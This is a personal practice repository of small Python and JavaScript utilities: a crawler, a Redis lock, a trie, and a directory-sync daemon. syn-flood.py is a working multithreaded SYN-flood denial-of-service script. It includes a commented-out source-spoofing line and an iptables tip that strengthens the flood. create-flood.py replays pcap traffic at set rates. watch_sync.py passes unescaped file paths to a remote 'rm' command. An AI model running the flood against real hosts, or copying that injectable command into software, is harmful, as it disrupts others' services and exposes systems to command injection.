├── README.md
├── create-flood.py
├── find_tail_lines.py
├── my_mutex.py
├── simplemultithreadsCrawler.py
├── syn-flood.py
├── trie.js
└── watch_sync.py

/README.md:
--------------------------------------------------------------------------------
# my-python-practices

simplemultithreadsCrawler.py:

A simple multithreaded producer/consumer crawler. To use it, subclass the parser and override its parse_links method with your own parsing rules, then push the URLs you still want to crawl onto the URL queue; the crawler threads pick them up automatically. A minimal usage sketch follows at the end of this README.

syn-flood.py:

Builds SYN packets with scapy and reports pps statistics, but performance is poor, and scapy also responds to the server's ACK packets.

watch_sync.py:

Watches a local directory; when files under it are modified, deleted, or created, the corresponding files in a remote directory are modified, deleted, or created as well.
Uses the pyinotify module to watch the directory and paramiko to upload files to the remote host.
When the script is turned into a daemon, redirecting standard output to a file no longer works and I don't know where the output ends up; help from anyone who knows is appreciated.

my_mutex.py:

A lock implemented on top of Redis, usable as a multi-process or distributed lock.

find_tail_lines.py:

Reads and prints M lines of a file, starting from the N-th line counted from the end.

trie.js:

> A prefix tree (trie) implemented in JavaScript. Performance is strong; not sure whether to credit the trie or JS. It can be used for word-frequency counting, word lookup and prefix matching.
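
A minimal usage sketch for the crawler (Python 2; the regex is illustrative, adapt it to your target site):

```python
import re
import Queue
import urlparse
from simplemultithreadsCrawler import Crawler, Parser

class MyParser(Parser):
    def parse_links(self, response):
        # Collect absolute links from the page and feed them back to the crawler.
        links = re.findall(r'href=["\'](http[^"\']+)["\']', response.content)
        for link in links:
            self.url_queue.put(urlparse.urljoin(response.url, link))
        return bool(links)  # returning False tells the crawler to stop

url_queue, response_queue = Queue.Queue(), Queue.Queue()
url_queue.put("http://blog.csdn.net/ECHOutopia/article/list/1")
crawler = Crawler(url_queue, response_queue)
parser = MyParser(url_queue, response_queue)
crawler.start()
parser.start()
crawler.join()
parser.join()
```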
--------------------------------------------------------------------------------
/create-flood.py:
--------------------------------------------------------------------------------
#coding=utf-8
import os
import sys
import fcntl
import math
import json
from optparse import OptionParser
from scapy.all import *


'''
Pre-generate the packets to send, then replay them with a packet-replay tool.
-p/--pps controls the rate, -s sets how long the transmission lasts, -f names the
pcap file and -i picks the interface; if -i is omitted the script assigns one itself.
Unused interfaces are assigned first; one interface can be shared by at most two
users (change the limit if you like), beyond that the interface is not handed out.
'''
def get_argument():
    usage = "usage: %prog [options], use -h or --help for help"
    parser = OptionParser(usage=usage)
    parser.add_option("-p","--pps",dest="pps",help="packets per second to send, default=1000",type="int",default=1000)
    parser.add_option("-s","--seconds",dest="seconds",\
        help="how many seconds the transmission lasts, default is 60 seconds",type="int",default=60)
    parser.add_option("-f","--file",dest="filename",help="the pcap file to replay")
    parser.add_option("-i","--interface",dest="interface",\
        help="the interface to send on; if not specified, one is assigned automatically")
    (options, args) = parser.parse_args()
    arguments = options.__dict__
    if arguments['filename'] is None:
        parser.print_help()
        sys.exit(1)
    return arguments


def tran_time_to_loop(pps,seconds,filename):
    try:
        cap = open(filename,"rb")
        cap.close()
    except IOError:
        print "cannot open cap file"
        sys.exit(1)
    capfile = sniff(offline=filename)
    packet_nums = len(capfile)  # number of packets in the capture file
    print "%s pps" % pps
    print "%s packets in capfile" % packet_nums
    loop = int(math.ceil(float(pps*seconds)/packet_nums))  # replays needed for this pps and duration
    print "%s loops" % loop
    return loop
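
# Worked example of the loop arithmetic above (the numbers are hypothetical):
# pps=1000 for seconds=60 asks for 60,000 packets; if the pcap holds 500 packets,
# loop = ceil(60000 / 500.0) = 120, i.e. tcpreplay replays the file 120 times.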

class flood_manage:

    # def __new__(cls, *args, **kw):
    #     if not hasattr(cls, '_instance'):
    #         orig = super(flood_manage, cls)
    #         cls._instance = orig.__new__(cls, *args, **kw)
    #     return cls._instance

    def __init__(self,inter_file="/tmp/inter_file"):
        self.__all_inter = set()
        self.__inter_file = inter_file
        self.__get_inter_name()
        if not os.path.exists(self.__inter_file):
            open(self.__inter_file,"w").close()
        self.__used_inter = self.__read_file()

    def __write_file(self,data):
        '''
        Take an exclusive lock when writing the file (a shared lock is taken when reading).
        '''
        inter_file = open(self.__inter_file,"w")
        fcntl.flock(inter_file,fcntl.LOCK_EX)
        json.dump(data,inter_file)
        fcntl.flock(inter_file,fcntl.LOCK_UN)
        inter_file.close()

    def __read_file(self):
        inter_file = open(self.__inter_file,"r")
        fcntl.flock(inter_file,fcntl.LOCK_SH)
        try:
            data = json.load(inter_file)
        except ValueError:
            data = {}
        fcntl.flock(inter_file,fcntl.LOCK_UN)
        inter_file.close()
        return data

    def __get_inter_name(self):
        '''
        Collect all non-loopback interfaces into __all_inter.
        '''
        proc_net_dev = "/proc/net/dev"
        with open(proc_net_dev,"r") as f:
            f.next()  # skip the two header lines
            f.next()
            for line in f:
                eth_name = line.split(":")[0].strip()
                if eth_name and eth_name != "lo":
                    self.__all_inter.add(eth_name)

    def find_aval_inter(self):
        '''
        Assign an available interface, preferring interfaces that nobody is using yet.
        '''
        for i in self.__all_inter:
            if self.__used_inter.get(i) in (0,None):
                self.__used_inter[i] = 1
                self.__write_file(self.__used_inter)
                return i
        for i in self.__all_inter:
            if self.__used_inter.get(i) == 1:
                self.__used_inter[i] = 2
                self.__write_file(self.__used_inter)
                return i
        print "no available interface, please wait"
        sys.exit(1)


    def create_flood(self,pps,loop,filename,interface):
        '''
        Run the replay; when it finishes or an exception occurs (e.g. the user hits Ctrl-C),
        update the interface usage map __used_inter.
        Because os.system runs the command in a forked child, concurrent users do not conflict.
        '''
        execStr = "tcpreplay --pps=%s --loop=%s --intf1=%s %s" % (pps,loop,interface,filename)
        try:
            os.system(execStr)
        except:
            pass
        finally:
            # re-read the usage map first (other users may have changed it),
            # then release this interface on top of the fresh copy
            self.__used_inter = self.__read_file()
            self.__used_inter[interface] = max(self.__used_inter.get(interface, 1) - 1, 0)
            self.__write_file(self.__used_inter)


if __name__ == "__main__":
    arguments = get_argument()
    manage = flood_manage()
    interface = arguments.get("interface") or manage.find_aval_inter()
    loop = tran_time_to_loop(arguments['pps'],arguments['seconds'],arguments['filename'])
    manage.create_flood(arguments['pps'],loop,arguments['filename'],interface)

--------------------------------------------------------------------------------
/find_tail_lines.py:
--------------------------------------------------------------------------------
#coding=utf-8
def find_tail_lines(fname, rev_n, line_num):
    '''
    Print line_num lines of a file, starting from the rev_n-th line counted from the end.
    :param fname: path of the file
    :param rev_n: start from the rev_n-th line from the end
    :param line_num: how many lines to read
    :return: nothing; the lines are printed
    '''
    with open(fname, 'rb') as f:
        buf_len = min(1024 * line_num, 4096)
        f.seek(0, 2)
        cur_pos = f.tell()  # position of the end of the file
        new_line_count = 0
        while cur_pos > 0:  # walk backwards block by block
            prev_pos = cur_pos
            cur_pos -= buf_len
            if cur_pos < 0:
                cur_pos = 0
                block_size = prev_pos
            else:
                block_size = buf_len
            f.seek(cur_pos)
            content = f.read(block_size)
            new_line_count += content.count('\n')  # newlines seen so far
            extra_count = new_line_count - rev_n  # how many lines too far back we have gone
            if extra_count >= 0:
                start_pos = 0
                for i in range(0, extra_count):  # skip forward to the rev_n-th line from the end
                    start_pos = content.find('\n', start_pos) + 1
                f.seek(cur_pos + start_pos)
                # print "---", f.read(), "---"
                for _ in range(0, line_num):  # read line_num lines
                    print "--", f.readline()
                break
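
# A simpler (but less memory-frugal) sketch of the same idea, using collections.deque
# to keep only the last rev_n lines in memory; this helper is not part of the original file.
def tail_lines_simple(fname, rev_n, line_num):
    from collections import deque
    with open(fname, 'rb') as f:
        last_lines = deque(f, maxlen=rev_n)  # the final rev_n lines of the file
    return list(last_lines)[:line_num]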

def test():
    fname = "a.txt"
    find_tail_lines(fname, 5, 5)

if __name__ == "__main__":
    test()
--------------------------------------------------------------------------------
/my_mutex.py:
--------------------------------------------------------------------------------
import time
import redis
import threading
import multiprocessing
import random
import sys


class Key(unicode):
    def __getitem__(self, key):
        return Key(u"%s:%s" % (self, key))


class Mutex(object):
    def __init__(self, id, timeout, ident, re=None):
        self._key = Key(id)
        # create the connection lazily to avoid the mutable-default-argument pitfall
        self._re = re if re is not None else redis.StrictRedis(host='127.0.0.1', port=13379, db=4)
        self._timeout = timeout
        self._ident = ident

    def __enter__(self):
        self.lock()
        return self

    def __exit__(self, exc_type, exc_value, traceback):
        self.unlock()

    def lock(self):
        _lock_key = self._key['_lock:']

        re = self._re
        while True:
            # SET NX EX: take the lock only if nobody holds it, with an expiry as a safety net
            result = re.set(_lock_key, self._ident, nx=True, ex=self._timeout)
            if not result:
                time.sleep(0.01)
            else:
                return


    def unlock(self):
        _lock_key = self._key['_lock:']
        pipeline = self._re.pipeline
        with pipeline() as p:
            try:
                # WATCH/MULTI so the key is deleted only if we still own it
                p.watch(_lock_key)
                lock_ident = p.get(_lock_key)
                if lock_ident != self._ident:
                    return
                p.multi()
                p.delete(_lock_key)
                p.execute()
            except redis.WatchError:
                sys.stderr.write("not deleted\n")
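
# A minimal usage sketch of Mutex as a context manager (the key name, ident and
# connection parameters below are illustrative, not part of the original tests):
#
#   client = redis.StrictRedis(host='127.0.0.1', port=6379, db=0)
#   with Mutex('shared-counter', timeout=5, ident='worker-1', re=client):
#       pass  # critical section: only one holder of 'shared-counter' gets here at a time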

def test_mutex(name, proc_id):
    for i in xrange(20):
        mutex = Mutex(name, timeout=5, ident=proc_id)
        mutex.lock()
        sys.stderr.write(proc_id + " locked\n")
        time.sleep(0.01)
        mutex.unlock()
        sys.stderr.write(proc_id + " ---unlocked\n\n")



if __name__ == "__main__":
    processes = []
    for i in range(5):
        process = multiprocessing.Process(target=test_mutex, args=('lock', str(i)))
        process.daemon = True
        processes.append(process)

    for process in processes:
        process.start()
    for process in processes:
        process.join()
--------------------------------------------------------------------------------
/simplemultithreadsCrawler.py:
--------------------------------------------------------------------------------
#coding=utf-8
import threading
import Queue
import urlparse
import logging
import requests
import time
import signal
import re
# from collections import namedtuple

LOGGER = logging.getLogger(__name__)

def is_redirect(response):
    return response.status_code in (300, 301, 302, 303, 307)

class Crawler(threading.Thread):

    def __init__(self,url_queue,response_queue,
                 max_redirects=10,
                 max_tries=3,proxy=None,
                 delay_access_time=1):

        threading.Thread.__init__(self)
        self.max_redirects = max_redirects
        self.max_tries = max_tries
        self.delay_access_time = delay_access_time
        self.url_queue = url_queue
        self.response_queue = response_queue
        self.seen_urls = set()
        self.proxy = proxy
        self.session = requests.Session()
        self.session.headers.update({"User-Agent":\
            "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36"})

    def add_url(self, url, max_redirects=None):
        if max_redirects is None:
            max_redirects = self.max_redirects
        self.url_queue.put((url, max_redirects))


    def run(self):
        while True:
            item = self.url_queue.get(True)
            if item is None:
                break
            # queue items are either plain URLs or (url, remaining_redirects) tuples from add_url
            if isinstance(item, tuple):
                url, max_redirects = item
            else:
                url, max_redirects = item, self.max_redirects
            response = None
            tries = 0
            while tries < self.max_tries:
                try:
                    if self.proxy:
                        response = self.session.get(url, proxies=self.proxy)
                    else:
                        response = self.session.get(url)
                    if tries > 1:
                        LOGGER.info("try %s for %s succeeded", tries, url)
                    break
                except Exception as e:
                    LOGGER.error("try %s for %s raised %r", tries, url, e)
                    tries += 1
                    time.sleep(self.delay_access_time)
            else:
                LOGGER.error('%r failed after %r tries', url, self.max_tries)

            if response is None:
                self.url_queue.task_done()
                continue

            if is_redirect(response):
                location = response.headers['location']
                location_url = urlparse.urljoin(url, location)
                if max_redirects > 0:
                    self.add_url(location_url, max_redirects - 1)
            else:
                print "response_url:", response.url
                self.response_queue.put(response)
            self.url_queue.task_done()
            time.sleep(self.delay_access_time)
        self.session.close()

class Parser(threading.Thread):
    def __init__(self,url_queue,response_queue):
        self.response_queue = response_queue
        self.url_queue = url_queue
        threading.Thread.__init__(self)
        # self.save_queue = save_queue

    def run(self):
        while True:
            response = self.response_queue.get(True)
            print response.url, type(response)
            self.response_queue.task_done()
            parse_result = self.parse_links(response)
            if parse_result == False:
                self.url_queue.put(None)  # tell the crawler to stop
                break

    def parse_links(self, response):
        # look for the "next page" (下一页) link
        result = re.search(r'''(?i)href=["']([^\s]+)[\s"'\s]>下一页''', response.content)
        # print result.group(1)
        if result:
            url = urlparse.urljoin(response.url, result.group(1))
            self.url_queue.put(url)
            return True
        else:
            return False


if __name__ == "__main__":
    url_queue = Queue.Queue()
    url_queue.put("http://blog.csdn.net/ECHOutopia/article/list/1")
    response_queue = Queue.Queue()
    crawler = Crawler(url_queue,response_queue)
    parser = Parser(url_queue,response_queue)
    crawler.start()
    parser.start()
    crawler.join()
    parser.join()
--------------------------------------------------------------------------------
/syn-flood.py:
--------------------------------------------------------------------------------
import sys
import threading
from scapy.all import *
import random
import signal
import time

thread_limit = 200
total = 0

class SynFlood(threading.Thread):
    def __init__(self, target, port):
        threading.Thread.__init__(self)
        self.target = target
        self.port = port

    def build_syn_packet(self):
        ip = IP()
        # ip.src = "%d.%d.%d.%d" % (random.randint(1,254),random.randint(1,254),random.randint(1,254),random.randint(1,254))
        ip.src = "192.168.65.128"
        ip.dst = self.target

        tcp = TCP()
        tcp.sport = random.randint(1,65535)
        tcp.dport = self.port
        tcp.flags = 'S'
        return ip/tcp

    def run(self):
        global total
        syn_packet = self.build_syn_packet()
        s = conf.L3socket(iface='eth0')
        while True:
            s.send(syn_packet)
            total += 1
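
# Note (not part of the original script): because the packets come from a raw socket,
# the local kernel has no matching connection and answers the target's SYN-ACKs with RST
# packets. A common workaround is to drop those outgoing RSTs, for example:
#   iptables -A OUTPUT -p tcp --tcp-flags RST RST -d <target> -j DROP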

def handler(signum, frame):
    print "exit"
    # with open("a.txt","w") as f:
    #     f.write(total)
    print "time:", time.time()-start_time
    print "packet num:", total
    print "pps:", total/(time.time()-start_time)
    sys.exit()

if __name__ == "__main__":
    if len(sys.argv) != 4:
        print "example: %s 127.0.0.1 8080 20" % sys.argv[0]
        sys.exit(1)

    target = sys.argv[1]
    port = int(sys.argv[2])
    concurrent = int(sys.argv[3])
    signal.signal(signal.SIGINT, handler)
    signal.signal(signal.SIGTERM, handler)
    threads = []
    start_time = time.time()
    for _ in range(0, concurrent):
        t = SynFlood(target, port)
        t.setDaemon(True)
        threads.append(t)
        t.start()
    # for _ in range(0,concurrent):
    #     t.join()
    while True:
        time.sleep(1)
--------------------------------------------------------------------------------
/trie.js:
--------------------------------------------------------------------------------
function TrieNode(){
    this.count = 0;
    this.next = {};
    this.exist = false;

    this.insert = function(word){
        let node = this;
        for (let i of word){
            // console.log(i, node.next)
            if (! (i in node.next)){
                node.next[i] = new TrieNode()
            }
            node = node.next[i];
            node.count++;
        }
        node.exist = true;
    };

    this.search = function(word, prefix){
        let node = this;
        for (let i of word){
            node = node.next[i];
            if (!node){
                return false;
            }
        }
        if(node.exist || prefix){
            return node;
        }else{
            return false;
        }
    };

    this.get_through = function(root, out, is_root){
        let node = this;
        for (let i in node.next){
            let next_node = node.next[i];
            if (is_root){
                next_node.word = i;
                if (next_node.exist){
                    // also count single-character words reached directly from the root
                    out[next_node.word] = next_node.count;
                }
                next_node.get_through(root, out)
            }else{
                next_node.word = node.word.concat(i);
                if (next_node.exist){
                    out[next_node.word] = next_node.count;
                }
                next_node.get_through(root, out)
            }
        }
        node.word = '';
    };

    this.with_prefix = function(prefix, include_prefix){
        let node = this.search(prefix, true);
        if (node === false){
            return node;
        }else{
            node.word = prefix;
            let out = {};
            if (include_prefix){
                out[prefix] = node.count;
            }
            node.get_through(node, out, false);
            return out
        }
    }
}

// var strings = ['But', 'it', 'also', 'shows', 'that', 'bilinguals', 'are', 'more', 'flexible', 'thinkers', 'append', 'already', 'it', 'iron', 'item'];

// var root = new TrieNode();

// for (let i of strings){
//     root.insert(i)
// }
// console.log('search "thinker": ', root.search('thinker'));
// console.log('search "thinkers": ', root.search('thinkers'));
// console.log(root.with_prefix('it', true));
// console.log(root.with_prefix('it', false));
// var out = {};
// root.get_through(root, out, true);
// console.log(out);

module.exports = TrieNode
--------------------------------------------------------------------------------
/watch_sync.py:
--------------------------------------------------------------------------------
import sys
import os
import pyinotify
import paramiko

server = "127.0.0.1"
port = 22
username = "echo"
password = ""

class SSHConnection(object):

    def __new__(cls,*args,**kw):
        if not hasattr(cls,'_instance'):
            orig = super(SSHConnection,cls)
            cls._instance = orig.__new__(cls)
        return cls._instance

    def __init__(self,server,port,username,password):
        self.server = server
        self.port = port
        self.username = username
        self.password = password
        self._ssh = None

    def connection(self):
        if not self.is_connected():
            self._ssh = paramiko.SSHClient()
            self._ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
            self._ssh.connect(self.server, self.port,
                              username=self.username, password=self.password)
        return self._ssh

    def is_connected(self):
        transport = self._ssh.get_transport() if self._ssh else None
        return transport and transport.is_active()

    def exec_command(self,command):
        self.connection().exec_command(command)

    def get_sftp(self):
        self.connection()
        return self._ssh.open_sftp()




class EventHandler(pyinotify.ProcessEvent):

    def __init__(self,local_dir,remote_dir):
        self._ssh = SSHConnection(server,port,username,password)
        self._ssh.connection()
        self._sftp = self._ssh.get_sftp()
        self.local_dir = local_dir
        self.remote_dir = remote_dir

    # def process_IN_CREATE(self,event):
    #     print "created",event.pathname

    def get_remote_path(self,local_path):
        # strip the watched directory prefix from the local path ...
        local_sub_path = self.local_dir.endswith("/") and local_path[len(self.local_dir):] or local_path[len(self.local_dir)+1:]
        # print "local_sub_path",local_sub_path

        # ... and graft the remainder onto the remote directory
        remote_path = self.remote_dir.endswith("/") and self.remote_dir+local_sub_path or self.remote_dir+"/"+local_sub_path
        # print "remote_path",remote_path

        return remote_path
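
    # Worked example of the mapping above (the paths are illustrative):
    #   local_dir='/home/echo/src', remote_dir='/data/dst',
    #   local_path='/home/echo/src/a/b.txt' -> local_sub_path='a/b.txt'
    #   -> remote_path='/data/dst/a/b.txt'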

    def process_IN_DELETE(self,event):
        print "deleted",event.pathname
        self.del_remote_file(self.get_remote_path(event.pathname))

    # def process_IN_MODIFY(self,event):
    #     print "modified",event.pathname

    def process_IN_CLOSE_WRITE(self,event):
        # print "close_write",event.pathname,self.get_remote_path(event.pathname)
        self.upload_to_remote(event.pathname,self.get_remote_path(event.pathname))

    def process_IN_MOVED_FROM(self,event):
        print "moved from",event.pathname
        self.del_remote_file(self.get_remote_path(event.pathname))

    def process_IN_MOVED_TO(self,event):
        print "moved to",event.pathname
        self.upload_to_remote(event.pathname,self.get_remote_path(event.pathname))

    def del_remote_file(self,file_path):
        self._ssh.exec_command("rm %s" % file_path)

    def upload_to_remote(self,local_file,remote_file):
        try:
            self._sftp.put(local_file,remote_file)
        except Exception, e:
            print e


def make_deamon(stdin="/dev/null",stdout="/dev/null",stderr="/dev/null"):
    try:
        pid = os.fork()
        if pid > 0:
            sys.exit(0)
    except OSError, e:
        sys.stderr.write("fork failed: (%d) %s\n" % (e.errno,e.strerror))
        sys.exit(1)

    os.setsid()

    try:
        pid = os.fork()
        if pid > 0:
            sys.exit(0)
    except OSError, e:
        sys.stderr.write("fork failed: (%d) %s\n" % (e.errno,e.strerror))
        sys.exit(1)

    os.chdir("/")
    os.umask(0)

    for f in sys.stdout, sys.stderr: f.flush()
    si = open(stdin,"r")
    so = open(stdout,"a+",0)
    se = open(stderr,"a+",0)
    os.dup2(si.fileno(), sys.stdin.fileno())
    os.dup2(so.fileno(), sys.stdout.fileno())
    os.dup2(se.fileno(), sys.stderr.fileno())

def main():
    if len(sys.argv) != 3:
        print "Usage: python watch_sync.py watched_local_dir remote_dir"
        sys.exit(1)

    wm = pyinotify.WatchManager()
    mask = pyinotify.IN_CREATE | pyinotify.IN_DELETE | \
        pyinotify.IN_MODIFY | pyinotify.IN_CLOSE_WRITE | pyinotify.IN_MOVED_FROM | pyinotify.IN_MOVED_TO

    handler = EventHandler(sys.argv[1],sys.argv[2])
    notifier = pyinotify.Notifier(wm, handler)

    excl_lst = ['^\..*']
    excl = pyinotify.ExcludeFilter(excl_lst)
    wdd = wm.add_watch(sys.argv[1], mask, rec=True, exclude_filter=excl)

    try:
        notifier.loop()
    except pyinotify.NotifierError, err:
        print >> sys.stderr, err

if __name__ == "__main__":
    # make_deamon(stdout="/tmp/watch_file.log")
    main()
--------------------------------------------------------------------------------